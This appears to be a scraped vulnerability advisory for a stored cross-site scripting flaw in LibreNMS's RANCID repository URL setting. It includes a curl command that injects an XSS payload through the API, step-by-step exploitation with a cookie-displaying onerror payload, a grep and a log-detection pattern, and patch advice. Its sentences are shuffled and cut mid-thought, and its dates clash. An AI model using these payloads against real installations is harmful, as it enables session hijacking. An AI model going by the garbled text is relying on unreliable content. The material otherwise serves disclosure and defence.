Listen to this Post
The vulnerability arises from improper sanitization of the `rancid_repo_url` configuration value within the RANCID Integration settings of LibreNMS. The application fails to validate this user-controlled input on saving and does not apply context-appropriate HTML encoding when rendering it. The flaw is located on the `/device/{id}/showconfig` page. The vulnerable code line is found in Platform: LibreNMS Analytics – The following `curl` command simulates the malicious configuration change via the LibreNMS API, injecting an XSS payload into the `rancid_repo_url` setting. The following `grep` command statically analyzes the vulnerable source code pattern across the codebase to identify similar unsafe concatenations. A log analysis for indicators of compromise (IoC) can be performed using `awk` to detect abnormal `rancid_repo_url` values in the audit logs. 1. Log in to LibreNMS as an administrative user. Successful exploitation allows an attacker with administrative privileges to execute arbitrary JavaScript code in the browser of any user viewing the affected device’s configuration page. This can lead to session hijacking, unauthorized data access, and further compromise of the LibreNMS instance, especially in environments with multiple administrators. Reported By: github.comincludes/html/pages/device/showconfig.inc.php, at line 13, where the `rancid_repo_url` is directly concatenated into an HTML anchor (<a>) tag without using `htmlspecialchars()` in the correct context. An authenticated attacker with administrative privileges can inject malicious JavaScript payloads into the `rancid_repo_url` field. For example, a payload like `”>dailycve form:
Version: before 26.3.0
Vulnerability: Stored Cross-Site Scripting
Severity: Medium
Date: 2026-04-13Prediction: Patch date 2026-03-16
What Undercode Say:
curl -X POST -H "X-CSRF-TOKEN: <csrf_token>" -H "Cookie: <session_cookie>" \
-d "rancid_repo_type=git-bare" \
-d "rancid_repo_url=\"><img/src/onerror=alert(1)><a x=\" \
-d "rancid_configs=/path/to/git-repo.git" \
https://target/librenms/ajax_form.php
grep -rn "echo.<a href=.\.get('rancid_repo_url')" includes/html/pages/device/
awk '/settings\/external\/rancid/ && /repo_url/ {print $0}' /var/log/librenms/audit.log | grep -E "<script|onerror|javascript:"
Exploit:
2. Navigate to `Settings` -> `External` -> `RANCID Integration`.
3. Set `RANCID Configs` to any valid existing directory ending in `.git`.
4. Set `RANCID Repository URL` to the payload: `”><img/src/onerror=alert(document.cookie)><a x=”./device/{id}/showconfig
<h2 style="color: blue;">5. Save the configuration.</h2>
6. Visit any device's configuration page (e.g.,). The XSS payload will execute, displaying the user's cookie in an alert box.htmlspecialchars(LibrenmsConfig::get(‘rancid_repo_url’), ENT_QUOTES, ‘UTF-8’)`.
<h2 style="color: blue;">Protection from this CVE</h2>
Immediate Action: Upgrade to LibreNMS version 26.3.0 or later, which includes the proper output encoding for the `rancid_repo_url` field.
Workaround: If upgrading is not possible, manually modify the vulnerable file `includes/html/pages/device/showconfig.inc.php` to replace the direct concatenation of `LibrenmsConfig::get('rancid_repo_url')` with
Hardening: Restrict administrative access to the web interface and monitor audit logs for unauthorized changes to the `rancid_repo_url` configuration.Impact
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Extra Source Hub:
Undercode🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]
📢 Follow DailyCVE & Stay Tuned:

